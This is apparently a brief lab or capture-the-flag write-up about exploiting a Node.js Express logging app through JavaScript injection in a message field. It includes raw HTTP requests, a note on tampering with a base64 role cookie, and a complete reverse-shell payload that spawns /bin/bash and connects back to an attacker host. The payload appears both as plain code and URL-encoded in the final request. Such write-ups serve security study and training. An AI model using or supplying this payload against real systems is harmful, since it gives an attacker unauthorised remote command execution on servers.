Node.Js Command Injection

Nodejs RCE and a simple reverse shelli break software - My work with different software, bug hunting and interesting tidbits

Weak authentication

The next interesting find is the add technical details/code if required Event Message. Considering that this is a NodeJS application, it might be possible to inject Javascript Code.

3000/tcp  open  http    syn-ack ttl 63 Node.js (Express middleware)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS

To test this, we'll send a simple 1+1 operation as an "Event Message".

Request Used:

POST /logs/new HTTP/1.1
Host: 192.168.135.110:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
Origin: http://192.168.135.110:3000
Connection: close
Referer: http://192.168.135.110:3000/logs/
Cookie: connect.sid=s%3AmSgkU3koIQeob1Pioo6GSNTjGvc71M7v.ehFLVLDZWnWSLoKEcRe%2B4BWhaQz7TCQJ9dub4Xc3Cac; userLevel=YWRtaW4=
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=khjkhk&msg=2%2B2

Notice the userLevel cookie how we can exploit it by changing it in base64.

Send event

After reviewing the resulting stored message, we confirm that it actually saved 2.

Since we already saw that the website was vulnerable to NodeJS command injection. We copied the following line of code.

var net = require("net"), sh = require("child_process").exec("/bin/bash");
var client = new net.Socket();
client.connect(80, "attacker-ip", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);
sh.stderr.pipe(client);});

Changing the script to connect to port 3000 and changing out listening host to our IP. Would result in a reverse shell.

Request Used:

POST /logs/new HTTP/1.1
Host: 192.168.135.110:3000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 344
Origin: http://192.168.135.110:3000
Connection: close
Referer: http://192.168.135.110:3000/logs/
Cookie: connect.sid=s%3AmSgkU3koIQeob1Pioo6GSNTjGvc71M7v.ehFLVLDZWnWSLoKEcRe%2B4BWhaQz7TCQJ9dub4Xc3Cac; userLevel=YWRtaW4=
Upgrade-Insecure-Requests: 1
Sec-GPC: 1

username=hjb&msg=var+net+%3D+require%28%22net%22%29%2C+sh+%3D+require%28%22child_process%22%29.exec%28%22%2Fbin%2Fbash%22%29%3B%0D%0Avar+client+%3D+new+net.Socket%28%29%3B%0D%0Aclient.connect%283000%2C+%22192.168.49.135%22%2C+function%28%29%7Bclient.pipe%28sh.stdin%29%3Bsh.stdout.pipe%28client%29%3B%0D%0Ash.stderr.pipe%28client%29%3B%7D%29%3B